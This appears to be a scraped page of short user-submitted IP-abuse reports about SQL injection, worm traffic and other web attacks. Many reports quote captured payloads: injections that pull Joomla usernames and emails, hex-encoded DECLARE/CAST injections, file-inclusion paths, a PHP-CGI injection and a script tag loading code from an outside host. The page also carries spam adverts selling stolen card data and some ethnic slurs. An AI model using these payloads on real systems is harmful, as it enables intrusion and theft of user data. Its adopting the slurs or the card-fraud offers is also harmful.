SQL Injection

188.143.232.12, 188.143.232.33, 188.143.232.36, 188.143.232.84, 188.143.232.105, 188.143.232.108, 188.143.232.113, 188.143.232.144, 188.143.232.146, 188.143.232.147, 188.143.232.176, 188.143.232.211 ...

web post submissions sent from this IP 188.143.232.176 http://top-777.com - http://antacasino.com - http://submit-article.org Mozilla/4.0 (compatible; MSIE 4.01; Digital AlphaServer 1000A 4/233; Windo...

This IP address is trying to Hack my website with SQL injection. the attacker does this almost every day. I don\'t really know how stop Him...

from 188.143.232.176 there are many attacks coming in trying to reset password or inject joomla component components/com_portfolio HTTP/1.1\" 200 5895 \"http://www.google.com/\" \&quot...

188.143.232.12, 188.143.232.33, 188.143.232.36, 188.143.232.84, 188.143.232.105, 188.143.232.108 188.143.232.113, 188.143.232.144, 188.143.232.146, 188.143.232.147, 188.143.232.176, 188.143.232.211, 1...

Have had this IP trying to inject refers into my web site. How can I stop this? The IP has tried ten times, without any luck....

Have had this IP trying to inject refers into my web site. How can I stop this? The IP has tried ten times, without any luck....

A person from this IP, 113.181.224.36 is from Vietnam, has been trying repeated SQL Injections attempts. The IP should be blocked. Strings like %2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f...

A person from this IP, 113.181.224.36 is from Vietnam, has been trying repeated SQL Injections attempts. The IP should be blocked. Strings like %2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f...

HTTP_USER_AGENT : Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 GTB7.1 ==> This Person Continues to Fill My Submission Form singingfem@aol.com - 188.143.2...

Here\'s the report : ** Table name in url [GET:survey] => \\\'and(select 1 from(select count(*),concat((select username from jos_users where usertype=\\\'super administrator\\\' limit 0,1),floor(r...

our whole service is down due to this ip sql injection. our server is not working, log from tis ip today via ssh and they have destroy our server...

i am gettin attacked daily from this IP with this kind of worm Intrusion.Win.MSSQL.worm.Helkern This is the report from my antivirus UDP from 211.143.61.53 to local port 1434 Blocked: Intrusion.Win....

i am gettin attacked daily from this IP with this kind of worm Intrusion.Win.MSSQL.worm.Helkern This is the report from my antivirus UDP from 211.143.61.53 to local port 1434 Blocked: Intrusion.Win....

sql injection attack from 173.242.112.204 sql injection attack from 173.242.112.204 sql injection attack from 173.242.112.204 sql injection attack from 173.242.112.204 sql injection attack from 173.24...

viereruck@gmail.com, wessoywof@gmail.com, Tinoarcargine, clarmaliaidge@gmail.com 252+ spam items - 19-Nov-11 13:43 - 29-Dec-11 20:17 - 188.143.232.144 http://www.stopforumspam.com/ipcheck/188.143.232....

wrong name in my sql web, can anyone help me. because this my web very pussy. thnks you Nov 15 22:32:02 unix_chkpwd[22718]: password check failed for user (root) Nov 15 22:32:02 sshd[227....

attack prevented on 11-9-12 @ 5:22pm PST. Since I\'m seeing many complaints about this IP address, guess I\'m not the only one. Hope this guy/guys gets stopped soon. Glad AV got it....

Someone tried accessing my computer and the threat was blocked. Incoming signal. Happened on 11-10-12 @ 11:05 PM PST. Not sure why I\'m getting MS stuff on my Mac...

The record in below. 09:27:37.007133 IP h5-152-197-49.host.redstation.co.uk.1240 > personel.synvision.com.tw.microsoft-ds: Flags [S] 09:27:40.057340 IP h5-152-197-49.host.redstation.co.uk.1240 &gt...

*REMOTE_ADDR : 188.143.232.176 *HTTP_USER_AGENT : Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 GTB7.1 *DATE : [04/Nov/2012:17:40:07 +0100] *REQUEST_METHOD :...

<script>alert(\'BTS\')</script> s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s s...

WEB-PHP PHP CGI Argument Injection Attempt on one of my machines that host a ftp site yesturday afternoon. What is with the 25 word minimum complaint requirement....

This ip is filling my blog with junk garbage data, it is filling up my table space and it is spreading spam data in my site...

Help me.. That IP is trying to hack me , My PC keep slowing down. I scanned what\'s wrong and see that IP is trying to ddos my IP...

UDP from 66.102.135.227 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 10/18/2012 12:06:42 PM i dont know what an SQL Injection is...but thats what others filed this under. i wanted to...

Same as others before me. Kaspersky detected a Win.MSSQL.worm.Helkern intrusion from this address. Happened several times during the last week. It says UDP from 66.102.135.227 to local port 1434....

network attack from 66.102.135.227; intrusion picked up via Kaspersky. Several attacks during the last week. how many more words do you need. Surely not 23. yep yep....

Repeated attempts to exploit our SQL server. Abuse address listed for this ISP (Chananet xinjiang province) rejects my emails, so I thought I would post it here....

today, my Kaspersky Internet Security 2012 reported a network Intrusion.Win.MSSQL.worm.Helkern This company needs to be reported and stopped from sending out 66.102.135.227 is in Santa Monica Califo...

today, my Kaspersky Internet Security 2012 reported a network Intrusion.Win.MSSQL.worm.Helkern from 66.102.135.227. Please report it in the search results for this IP, its status is undefined, thanks...

We had several SQL attacks the last two weeks; So we have changed our Sql ports to something other than default, seeing 40+ connections from this address regarding port 1433 default sql port *(been o...

I reported this attack to iweb (where attack originated) they don\'t care... Contributing to the mess they are - the internet is turning into a toilet bowl because of people who\'s attitude about the ...

I detected an SQL Injection attempts on my website from this IP address. One of them was successful, but we managed to restore the site and block the IP from our firewall...

Please block this Ip .there is an attack from this IP .Need to do some serious action on it.Now need to work on it .already had a 43 complaint about it...

I detected an SQL Injection attempt on my website from this IP address. Passes this to one of my web pages: 10DECLARE@SVARCHAR(8000)SET@S=CAST(0X73657420616E73695F7761726E696E6773206F6666204445434C415...

This server was used for SQL injections into our CMS (ASP.NET 4.0 + SQL Server 2008 R2). this string : \"> </title><script src=\"http://inent17alexe.rr.nu/sl.php?v=2\">&l...

Our SQL Server is attacked during the morning from this IP and also trying to add links to a PHP include. Has anyone find a solution to this?...

This ip addresse is attacking to ur server and trying sql injection every day he attacks at least 10 times to the system and trying to add some links to the database ...

Email with source <html> <br> <b>Dear Customer, </b> <br><br> A debit order for life insurance from Liberty Life was placed on your account this morning and we have...

The person at this IP address has generated over 100 errors in the last hour with our system trying to hack it with SQL Injections. Please block them....

Yet another attempt to get into my server. Since two weeks WP Firewall reports around 150 attacks to my wordpress blogs. From IP Address 78.85.8.184...

WordPress Firewall has detected and blocked a potential attack! Web Page: www.phnconsulting.com/?tlc_transients_request Warning: URL may contain dangerous content! Offending IP: 174.120.70.143 [...

As others here. Trying to find my Joomla installation and usernames. Has brought site down once as I\'m not very technical. Think I\'ve managed to block it now. We\'ll see. Comes almost everyday with ...

Testing a variety of different extensions with sql injection. Same timeframe as other reports. *$_REQUEST DUMP -[option] => com_gbufacebook -[task] => show_face -[face_id] => \\\'and(s...

Also other IPs from the usa try this hack once a day, found in access_log 108.163.163.90 - - [17/Sep/2012:19:47:01 +0200] \"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../.....

Also other IPs from the usa try this hack once a day, found in access_log 216.222.193.53 - - [19/Sep/2012:22:33:24 +0200] \"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../.....

My virus protection had notified me that it had prevented an intrusion attempt by this number. I got this from theync.com I do not recommend anyone go there....

User hit site 100+ x in about 6 seconds with multiple injection commands. Blocked both .23 and .24 (.24 from a previous incident but it looks like the owner of these IP addresses is definitely up to n...

tries again and again to find installed Joomla Components with vulnerabilities such as com_hotels, com_extcalender etc in our non profit Joomla Site. Comes every day, sometimes twice...

** Table name in url [GET:extid] => \\\'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\\\' **...

** Table name in url [GET:tableid] => \\\'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\\\' ...

** Table name in url [GET:pid] => \\\'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\\\' ** T...

jamming up my email with a flood of requests for a page that does not exist on my server but who ever it is, is wasting their time ...

v****Hot****selling fresh cvv, dumps,bin,Wu trsfer,tracks 1&2 with pin etc........ Sell Cvv + Transfer WU + Bank Login + Dumsp + Paypal .... IF YOU NEED, CONTACT ME BY Yahoo : mayback.money Ma...

We have this IP and more from the owner, Beijing XiRang Media Cultural Co., Ltd. They tried to inject sql into a search code ....

This IP address performed 12 sql injections on my site cycling through fields on a sign up form. It was uncussfull thank goodness. This was performed on the 11th of Sept 2012...

I am getting sick of this 16 times in one hr, 300 times in a week is a bit much. How about you do something or else I will, and I will not be as nice. When all of China goes off line for good, and not...

Numerous (about 35) and persistent attempts picked up by wordpress firewall. Attempt consistent with reports already filed against this IP address. Executable file upload attemts....

Possible Executable File Upload Attack again from this region. IP blocked!!! This may be a very possible \"Executable File Upload Attack.\" that took place the 4ht Sept 2012...

** Table name in url [GET:Itemid] => 37\' and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\' **...

Try this GET attemp: 188.143.232.144 - - [04/Sep/2012:00:07:10 +0200] \"GET /index.php?option=com_rsform&Itemid=37\'+and(select%201%20from(select%20count(*),concat((select%20username%20from%2...

She ist trying to hack my website. Sehr tries to submit some sql injections through several webforms on my website. Hopefully she has no success in the web....

ich sende Beschw Compare to another IP IP Address: 173.193.179.133 IP Address Country: United States (US) IP Address Region: TX Texas IP Address City: Dallas IP Postal Code 75207 IP Address Area Code...

Traffic is constantly blocked from this IP by Symantec. And I get frequent attacks noticed from this ip address. Why is this organization attacking on my IP. ...

OSE Security picked up SQL injection - host and owner notified and no response from them. Dear Super User, An attack attempt was stopped by a 403 error page on 2012-08-25, 11:02:40 IP Address: 128.2...

Category: Intrusion Prevention Date & Time,Risk,Activity,Status,Recommended Action,IPS Alert Name,Default Action,Action Taken,Attacking Computer,Attacker URL,Destination Addre...

Persistant attacks populating form fields with 1 and -1\' . This IP address has been resported rather widely on the internet for similar attacks that have been continuing for a while....

my server become slow when i check my event log in found ther is continous attack from last 4 day there was a attack to sa account...

08/21/2012 12:30:22 AM Network Attack Blocker Detected Intrusion.Win.MSSQL.worm.Helkern Absent UDP from 220.132.158.137 to local port 1434 i have received an attack report from KIS firewall sys...

this ip has hacked my and deleted my all mysql database. i have found this ip in my log file. my site is www.campus100.in. now it is dead....

To inform this server has sent us SQL injections and crippled our website temporarily. Does anyone else have any info on who is behind thius...

From this IP address i received intrusion win mssql worm helkern at port 1434 at 11.31am indian GMT +5:30 kindly can i get all details about it...

They are systematically going through all URL\'s and form submissions by inserting a \"-1\" into various fields to see what errors or information that they can harvest....

atack red from this ip kapersky 2012 internet securyty detect and block in the worm do something with these ips that send network attacks if it fails we send all trojans and worms and network attacks ...

UDP from 61.128.110.96 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 14/08/2012 5:03:01 PM udp attack more than two times today. COuld you please check if this site is a bad site atta...

Intrusion detected from this IP address by my firewall. Resulted into stoppage of internet access and great inconvenience. Happening a second time in as many days....

I have received an attack against my website from IP:88.252.122.212. My monitoring system as reported \"Currently Some User has try to access the administrator from following IP:88.252.122.212 ...

this ip address attempts hack my pc .my kaspersky denied it . IT ATTAKS WITH Win.MSSQL.Worm.Helkern WHY IT DO THIS TELL ME PLZ HELP ME...

tries to sql inject using declare stmts. the injection tries to insert <sript> in to varchar fields. the script attempts to pls malware on a client machine attacks happening about every 12 hours...

I have blocked this on server and now they are using \"91.207.61.66\" They insert -1\' in various fields searching for a field that will show some info....

64.191.13.144 173.212.195.144 173.212.209.202 173.212.195.166 64.191.13.150 This guy runs HEX injections. Scan your URLs and form submissions for CAST en EXEC. He is client with burst.net and inject...

64.191.13.150 64.191.13.144 173.212.195.144 173.212.195.166 This guy is client with www.burst.net. I am going to file a complaint with the IC3 and charge him for the damage he did on 3 of my client...

Repeated SQL injection attempts across two separate address ranges related only in that they belong to the same company. Shows pre-planning, not a simple infection or accidental misfire of a tool. ...

This IP address attempts to hack my PC.Why Such problems only With Kaspersky Total internet Security 2012.China is a big problem to world.Kindly look into this matter...

needs to be taken off the internet and put in prison for at least a year of hard labor in a camp in the desert...

We are also a victim of SQL injection from this ip. They also used this IP 96.9.173.32 for the same purpose also from Burstnet. ...

3Dcast%280x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f52207...

sql inhjection with intention to destroy data. using script to alter data in all tables to which script can has access declare+%40s+varchar%288000%29+set+%40s%3Dcast%280x73657420616e73695f7761726e696...

Hello, The following url string was received by the server for one of the sites we\'re managing: 173.212.197.234 / tdc=dsp&page=press_detail&pid=6+declare+%40s+varchar%288000%29+set+%40s%3Dcas...

My website himalayafineart.com was hacked om 31st July 2012 and the attack originated from this IP. I hope you can take stringent action against the miscreant to prevent this from happening again....

This attacker tried many times to submit online form Populated fields with 1 and -1\' which is used for sql injection It seems like this attacker has many IP addresses...

am black and i dnt khnow wtf !! huhu /home/ipillion/public_html/html/html_site.php take a look !!! uu well be fuck\'up ..time kill uu ******************************************************************...

My antivirus just blocked this site from hacking my PC. Message: Kaspersky detection: UDP de 61.128.110.96 al puerto local 1434 Denegado: Intrusion.Win.MSSQL.worm.Helkern 30/07/2012 11:42:41 p.m. This...

This IP Address, 176.223.201.13, is attempting to attack an SQL Server on our network. IP address of 93.95.102.206 is also being used for this, so both are now blocked....

This IP Address, 93.95.102.206, is attempting to attack an SQL Server on our network. IP address of 176.223.201.13 is also being used for this, so both are now blocked....

Attack from this IP, blocked by Norton. on July 21 2012 at 2:01:03 pm. I had never seen this one before, anyone know anything? I would appreciate any info...

This IP has done the same as everyone else - blocking the IP address now ** Table name in url [GET:func] => \\\'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),...

This site is looking for users and security holes in my Joomla installation. The following is a report sent of their script ** Table name in url [GET:func] => \\\'and(select 1 from(select count(...

This person is injecting code into my site such as: ** Table name in url [GET:func] => \\\'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x fr...

** Table name in url [GET:func] => \\\'and(select 1 from(select count(*),concat((select username from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and\\\' ** ...

Last week legend in their own mind \"hacker\" attempted to break into the site using SQL Injection and other well known but obsolete methods. Try not to laugh at this noob when he tries bre...

This ip addres tried to hack my site... several times in this week Tries to enter my site with http get, try to login to back end, etc ... ...

On 16 July 2012 this IP tried by REQUEST_METHOD : GET to select username from DB but failed as i\'m using the Marco\'s interceptor plugin. ...

The attacker is the owner correlated to the domain BLUEDANIEL.COM, which is hosted on the above IP or using it as nameserver. The owner of bluedaniel.com even left even his name on our server (a fash...

searching for vulnerabilities , found multiple attempts in log files. trying to get usernames, and passwords. Attack lasted a few minutes. Was not successful in any attempt....

Les urls phpmyadmin sont crawlées et testées afin de savoir si une faille existe. Ce n\'est pas la seule addresse ip venant de ce serveur, il me semble que cela soit la m&Ati...

UDP от 61.185.238.233 на локальный по&Ntilde...

Found this IP opening more than 60 connections per second and submitted additional parameters to pages for sql injection. This seriously affected my server and evaporated all the concurrent database c...

i am also getting lots of attack from this 61.185.238.233 to my network for udp 1434. And i am getting constant attack from this IP...

** Union Select [GET:viewform] => 1 UNION SELECT 1,2,3,4,group_concat(0x3a5f,username,0x3a,email,0x5f3a),6 from jos_users ** Table name in url [GET:viewform] => 1 UNION SELECT 1,2,3,4,group_conc...

Trying to break into my web site using 2012-07-05 20:46:17 195.70.36.86 54787 207.145.111.195 80 HTTP/1.1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) 400 - Hostname - This has happened many time ea...

I\'m Seller for : CC, CVV US,UK,CA, EURO,AU, Italian,Japan,France ... Selling cvv cvv US UK EU ASIA Bank longins tracks dumps ...... I sell fresh live cc CVV cv2 from all over the world. Trusted S...

This has been happening for a while now. Usually every couple of weeks. Multiple SQL Injection attempts. Have logged this IP address multiple times....

my kaspersky internet security alerts me that this guy is attacking me and the antivirus says:- UDP from 61.185.238.233 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 24-Jun-12 11:52:13 A...

The following vulnerability scan was performed in my server. Please investigate. The address was 123.211.200.164. The date was [23/Jun/2012:12:37:18 +0100]. PHP vulnerabilty [\"GET index.php?-ds...

Someone at this IP address tried to hack my Wordpress install twice, using SQL Injection to try to get the passwords. Have tried complaining to the IP owner....

I have received multiple SQL Injection attack from the attached IP addresses, Some of these have been included in previos blacklists Please add them to your blacklist. 173.212.225.10 173.212.225.2 17...

this ip is part of burstnet / hostnoc.net ranges engaged in hacking activities. Actively trying to hack into web servers using code injection methods. Have received 5300 hits from them in last 72 hour...

this ip is part of burstnet / hostnoc.net ranges engaged in hacking activities. Actively trying to hack into web servers using code injection methods. Have received 5300 hits from them in last 72 hour...

this ip is part of burstnet / hostnoc.net ranges engaged in hacking activities. Actively trying to hack into web servers using code injection methods. Have received 5300 hits from them in last 72 hour...

somebody in this IP is using ZmEu to get into my server, already 200 attempts these last 2 weeks. Please take appropiate action against \'m...

** Union Select [GET:viewform] => -1 UNION SELECT 1,group_concat(0x3a5f,username,0x3a,email,0x5f3a),3,4,5,6 from jos_users ** Table name in url [GET:viewform] => -1 -- 1,group_concat(0x3a5f,user...

This IP address from Germany is doing some log spam or referer bombing on several websites. Be sure to block this crook and report him to every blacklist you can find and also to report him to the FBI...

Please block that ip address of china immediately. They trying to access production server & test server also. Per day they trying nearly 200000 - 300000 attempts. Please avoid this issue....

It seems the above ip address is hammering my server every 5 sec to try and gain access to my SQL database. I am receiving the following error every 5 secs \"Login failed for user \'sa\'. Reason:...

Dear Guest, Namaste & Welcome!! We cordially welcome to Welcome Nepal Treks and Tours Pvt. Ltd. We would like to introduce Welcome Nepal Travel Agency /Nepal Tour Agency as one of the leading Tra...

Attacks have escalated from 199.188.204.95. There have been countless attempts to inject several sites on our server. shbg.info is a hacker\'s site and most of the emails use @shbg.info....

From my logs: 2012/05/23 09:51:43 -0400 COMPUTER jcxxxxx IP-BLOCK 222.186.24.13 (Type: incoming, Port: 1433, Process: svchost.exe) Like others have mentioned... this system is attempting to connect ...

This is a very bad ip does not play nice... attacking pc static.ads.crakmedia.com not safe at all watch out for it is this 25 or not...

The user fired more than 500 URL\'s with code containing SQL injection. Example: SQL Injection ? parameter: Wijnverzenddozen\": waitfor delay `0:0:4` ++ (I replaced the normal quotes by `) If ne...

Multiple attempts over the past several days trying to hack my wordpress site using sql injection. blah blah blah blah blah blah blah blah...

Mar 28 01:11:57 sunrise suhosin[27665]: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable \'controller\' (attacker \'193 .104.85.211\', file \'/var/www/WEBSITE/index.php\...

Greetings: This IP address contains a proxy that\'s being used to continuously sql inject attack our website. Appreciate looking into the situation. Thank you....

We have had numerous attempts by this ip address 91.207.60.66 try to injection sql database be carefully with this, we recived the injection by one our websites forms...

Attempted to gain access to my website using sql injection was catch by Marco\'s interceptor ** Local File Inclusion [GET:controller] => ../../../robots.txt ** Local File Inclusion [REQUEST:contr...

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"> <HTML><HEAD> <META http-equiv=Content-Type content=\"text/html; charset=gb2312\"> <META ...

please check this ip id , this person try to login my yahoo account and want to change my password.please help me and trace this hacker ....

We have had numerous attempts by this ip address to gain acces to our database using SQL injection. I have tracked the ip address a far as I can but that\'s all I can do...

Yet another attack of some sort from \"hinet.net\". Their IP\'s are always doing something unsavory. I wish that their whole infrastructure would just burn up!!!!...

UDP from 61.235.46.146 to local port 1434. Denied: Intrusion.Win.MSSQL.worm.Helkern. on 12/03/2012 08:50:39 UDP from 61.235.46.146 to local port 1434. Denied: Intrusion.Win.MSSQL.worm.Helkern. on 09...

This IP injected a Mailer script into my WP theme code and send over 2000 spam emails from my server. Was detected and cleaned, but not before the damage was done. Logs available. Please blacklist....

UDP from 61.235.46.146 to local port 1434: Intrusion.Win.MSSQL.worm.Helkern its been a month. UDP from 178.158.206.19 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 2/26/2012 5:14:30 P...

Intrusion.Win.MSSQL.worm.Helkern UDP from 61.235.46 .146 on 2012-02-11 at 17:36:59 again on 2012-02-15 at 23:08:03 again on 2012-02-21 at 21:30:53 again on 2012-03-05 at 15:28:12 Is there a pattern ...

Numerous submissions across several websites, multiple times per day attempting SQL injection on any form on the site. Recognized attack after bogus tags appeared on end of multiple postings. The foll...

Comes around several times a day, keeps posting data to pages that don\'t even have form fields. tried injection attacks, fortunately didn\'t succed. Is there any way to ban him?...

Attack from 190.120.236.65 to all my server IPs 70.59.222.x, every time I take down my servers and restage them the start attacking me after a few days....

11:04:45 PM Block IN TCP 60.173.10.236 6000 86.127.74.46 1433 SYN Blocked by the Attack Detecton component IP Address: 60.173.10.236 IP Address Country: China (CN) IP Address Region: 01 Anhui IP Add...

Comes around several times a day, keeps posting data to pages that don\'t even have form fields. tried injection attacks, fortunately didn\'t succed. I hope he burns in hell...

IP Address: 124.14.10.67 IP Address Country: China (CN) IP Address Region: 23 Shanghai IP Address City: Shanghai IP Postal Code IP Address Area Code 0 IP Metro Code 0 IP Address Latitude: 31.004999...

The IP address 69.94.137.92 in USA has attempted 3 hacks of an oscommerce website today. They have tried SQL injection trying to break through administrators access. We have blocked through htaccess...

Keeps trying SQL injection attacks. All attacks are from the same IP, over 200 attacks on a single day. o o o o o o o ...

They were attempts to find database administration tools like phpmyadmin. From log: 222.73.115.47 - - [28/Feb/2012:00:02:01 -0300] \"GET /phpmyadmin/index.php 222.73.115.47 - - [28/Feb/2012:00:...

They hacked in and installed a completly diffirent version of SQLexpress and changed my sa password, which was strong. They only got to some old sql .mdf files but i dont see how they could have insta...

9:09:12 PM Block IN TCP 180.61.12.71 53055 86.127.74.46 1433 SYN Blocked by the Attack Detecton component 9:09:06 PM Block IN TCP 180.61.12.71 53055 86.127.74.46 1433 SYN Blocked by the Attack Detecto...

7:34:14 PM Block IN TCP 119.98.0.195 63003 86.127.74.46 1433 SYN Blocked by the Attack Detecton component IP Address: 119.98.0.195 IP Address Country: China (CN) IP Address Region: 12 Hubei IP Addre...

Lots of errors coming through with SQL injection attacks showing up in logs. All errors from this same IP address. 250 errors in under 10 minutes...

The user is trying to hack our companies billing system by injecting SQL and PHP codes by raising tickets with injection codes,etc. The IP matches the one which is reported....

get them ,get them ,these guys tried my poor african computer all for nothing . i havent done them anything .Its being traced to a computer somewhere in China,Beijing....

UDP from 61.235.46.146 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 2/21/2012 3:06:34 AM UDP from 61.235.46.146 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 2/21/2012 3:...

UDP from 31.220.243.166 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 2/21/2012 4:14:58 PM UDP from 31.220.243.166 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 2/21/2012 ...

UDP from 218.75.49.242 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 2/20/2012 2:24:51 AM UDP from 218.75.49.242 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 2/20/2012 2:...

UDP from 202.56.192.195 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 2/20/2012 9:33:28 PM UDP from 202.56.192.195 to local port 1434 Denied: Intrusion.Win.MSSQL.worm.Helkern 2/20/2012...

union queries are being injected by this ip, block this ip address and remove it from the www. its creating havok. This is a very legitimate request....

SQL inject attack? username=admin password=asdfghjkl;\' ----------------- Date: 16:31:34 2012-02-22 User: IP: 208.115.247.250 Page: /crm/live/pages/share/login_check.php SQL inject attack? username=...

IP Address: 113.28.112.41 IP Address Country: Hong Kong (HK) IP Address Region: IP Address City: IP Postal Code IP Address Area Code 0 IP Metro Code 0 IP Address Latitude: 22.25 IP Address Longit...

Guys this guy is so abusive ! It is trying to hack my 3 three sites and also spamming ! Some one please stop this or I\'ll need to contact the police !...

Spybot worm injection on port 1434 from this chinese asshole......all they want to do is to spy others and broke computers and servers all over Globe IP Address: 218.75.49.242 IP Address Country: Ch...

IP Address: 213.64.48.129 IP Address Country: Sweden (SE) IP Address Region: 28 Vastra Gotaland IP Address City: Lidk�ping IP Postal Code IP Address Area Code 0 IP Metro Code 0...

IP Address: 217.64.98.68 IP Address Country: Mali (ML) IP Address Region: 01 Bamako IP Address City: Bamako IP Postal Code IP Address Area Code 0 IP Metro Code 0 IP Address Latitude: 12.6499996185 ...

Is trying to do sql injections on the company database. The date was Wednesday 2/15/2012 at 5:26 pm. There is a record of 20 times he tried. ...

Multiple hits from this ip. Signature Name: MSSQL Resolution Service Stack Overflow Attacker: 61.235.46.146:2041 ==> Victim x.x.x.x:1434 Signature ID: 4703 Sub-Signature ID: 0 Please consult t...

Someone from this IP has repeatly tried to attack my wordpress site, i get the error message emailed through to me: This may be a \"Wordpress- Specific SQL Injection Attack.\"...

Attempted attack on wordpress site. Attempted SQL Injection attack on wordpress site. Attempted SQL Injection attack on wordpress site. Attempted SQL Injection attack on wordpress site. Attempted SQL ...

Multiple attack payloads from this IP. All traffic observed from this IP is malicious. Primary attack type is SQL injection but other recon type attacks have also been observed....

the comment I have send to you just before!Anything changed since now! I do please you, install for your health computer KYS 2012, even if its a trial antivirus, it works very fine too.At the first at...

Attempting to post information to our website, sql injection, cross site scripting. Owner is listed as being in Ukraine. Submits invalid characters into our forms processing pages generating over 100 ...

many IP addresses from china are being blocked from my firewall. this is slowing down my system. attack: MS SQL server. for nothing, no value!...

Registered multiple SQL Injection attacks from IP, went through weblogs and found to be using user-agent: HTTP/1.0 Mozilla/4.0+(compatible;+Synapse). blocked user agent and ip address from server...

Since month I get attacked: UDP from 61.235.46.146 on local port 1434 Intrusion.Win.MSSQL.worm.Helkern Kaspersky does block it, but it is annoying and part of a long time of internetstalking through s...

Since month I get attacked: UDP from 61.235.46.146 on local port 1434 Intrusion.Win.MSSQL.worm.Helkern Kaspersky does block it, but it is annoying and part of a long time of internetstalking through s...

several attempts to inject sql into wordpress site I own. The message below is from the firewall plugin Offending IP: 193.105.240.173 [ Get IP location ] Offending Parameter: log = wp_admin ...

log_date log_msg src_ip src_port dst_ip dst_port log_description ----------------------- -------------------------- --------------- -------- -------...

218.75.49.242, 61.235.46.146 sending WIN.MSSQL.worm.Helkern . I m using internet daily from my personal computer. i have notice that everyday from same IP location somebody is attacking on my computer...

This isn\'t the first time from this IP address Kaspersky has denied an network intrusion attack from this IP address. Message I get is Intrusion.Win.MSSQL.worm.Helkern UDP from 124.239.195.131 to lo...

IP Address: 222.189.238.114 IP Address Country: China (CN) IP Address Region: 22 Beijing IP Address City: Beijing IP Postal Code IP Address Area Code 0 IP Metro Code 0 IP Address Latitude: 39.92890...

This IP needs to be blacklisted immediately! The hackers are using it to exploit SQL injection vulnerability. Offending IP: 193.105.240.173 [ Get IP location ] Offending Parameter: log = wp_admi...

Network attack by intrusion win.MSSQL.worm.Helkern the metioned ip address is being used to attack the network Network attack by intrusion win.MSSQL.worm.Helkern the metioned ip address is being used ...

The attack have been identified by Kaspersky Internet security Intrusion.WIN.MSSQL.worm.Helkern this report generated by kaspersky internet security v 2012..... ____________________________________...

Logs from Sourcefire appliance. Times are GMT+0 2012-01-24 19:26:01 IPS-PT / sdc1pe00ssf01 tcp 173.0.5.188:1489 -> 172.17.1.125:80 SQL union select - possible sql injection attempt - GET parameter...

I want to report abuse from this ip address it try to use sql injection to log in our portal gjuhashqipe.com please disable this ip address thank you...

Malicious hacking activity, maybe, maybe not? Tried on numerous occasions to SQL inject database on numerous sites I am managing, seems IP address is from Ukraine....

** Local File Inclusion [GET:view] => /../../../../../../../../../../proc/self/environ ** Local File Inclusion [REQUEST:view] => /../../../../../../../../../../proc/self/environ **PAGE / SERV...

** Local File Inclusion [GET:start] => ../../../../../../../../../../proc/self/environ ** Local File Inclusion [REQUEST:start] => ../../../../../../../../../../proc/self/environ **PAGE / SERVER...

2012/01/22 04:44:16 ب.ظ Detected: Intrusion.Win.MSSQL.worm.Helkern UDP from 61.235.46.146 to local port 1434 Absent i have received a report about this ip attacking my s...

This IP address is attempting to hack several sites that I manage using SQL injection methods. This IP address is attempting to hack several sites that I manage using SQL injection methods. ...

** Local File Inclusion [GET:controller] => ../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ 00 ** Local File Inclusion [REQUEST:controller] => ../../.....

i receive more than 500 emails .I think thant they try to make sql injection.When i wanted to trace ip location is in morroco in north africa...

The attack have been identified by Kaspersky Internet security Intrusion.WIN.MSSQL.worm.Helkern this report generated by kaspersky internet security v 2012 please do accept and inspect the ip. Thank...

** Local File Inclusion [GET:view] => /../../../../../../../../../../proc/self/environ ** Local File Inclusion [REQUEST:view] => /../../../../../../../../../../proc/self/environ **PAGE / SERV...

** Local File Inclusion [GET:view] => ../../../../../../../../../../proc/self/environ ** Local File Inclusion [REQUEST:view] => ../../../../../../../../../../proc/self/environ **PAGE / SERVER I...

fgfd yt yrr trytry tyty tytry tyty tyty rtytr trty tryty yuytu yuy ry y5y5 yyytr tryrtyfgfd yt yrr trytry tyty tytry tyty tyty rtytr trty tryty yuytu yuy ry y5y5 yyytr tryrty tryty y trytytry trytry...

Description: There was an unsuccessful attempt to login into the backend section of your website using an unknown username. Date of event: 19.01.2012 09:58:45 User IP: 94.236.93.234 script kiddies go...

IP 109.149.141.0 attempting scan and PHP and SQL injection attack against our servers in address range 193.195.133.* No harm done as it appears to be script kiddie but reporting in case more serious. ...

2012/01/17 10:29:21 ب.ظ Detected: Intrusion.Win.MSSQL.worm.Helkern UDP from 124.239.195.131 to local port 1434 Absent i was attacked by this IP and rejected it with KIS 2...

